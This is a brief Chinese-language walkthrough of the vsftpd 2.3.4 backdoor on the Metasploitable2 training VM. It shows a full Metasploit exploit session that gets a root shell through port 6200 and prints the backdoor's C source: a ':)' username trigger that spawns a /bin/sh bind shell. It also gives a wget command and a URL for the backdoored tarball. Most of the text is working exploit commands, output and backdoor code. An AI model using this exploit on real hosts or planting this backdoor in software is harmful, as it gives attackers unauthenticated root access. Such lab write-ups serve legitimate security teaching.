Metasploit2 - tcp port 21 - vsftpd

Metasploitable2 的21号端口，运行的是vsftp服务。该版本的源码被攻击者植入了后门。后门很快被移除，但是还是有部分人下载了它。如果登录的用户名结尾是“:)” [笑脸], 那么在6200端口会监听一个后门.msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(vsftpd_234_backdoor) > run
 
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.113:44787 -> 192.168.1.111:6200) at 2014-07-29 21:24:27 -0400
 
id
uid=0(root) gid=0(root)后门代码如下:

wget http://ftp.gwdg.de/pub/cert.dfn/tools/net/vsftpd/vsftpd-2.3.4.tar.gz

========= [后门源码] str.c ============
int
str_contains_space(const struct mystr* p_str)
{
  unsigned int i;
  for (i=0; i < p_str->len; i++)
  {
    if (vsf_sysutil_isspace(p_str->p_buf[i]))
    {
      return 1;
    }
    else if((p_str->p_buf[i]==0x3a)
    && (p_str->p_buf[i+1]==0x29))      // :)
    {
      vsf_sysutil_extra();
    }
  }
  return 0;
}

========= [后门源码] sysdeputil.c ============

int
vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  exit(1);
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
  sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
  for(;;)
  {
    rfd = accept(fd, 0, 0);
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
    execl("/bin/sh","sh",(char *)0);
  }
}

vsftp下载地址:
http://ftp.gwdg.de/pub/cert.dfn/tools/net/vsftpd/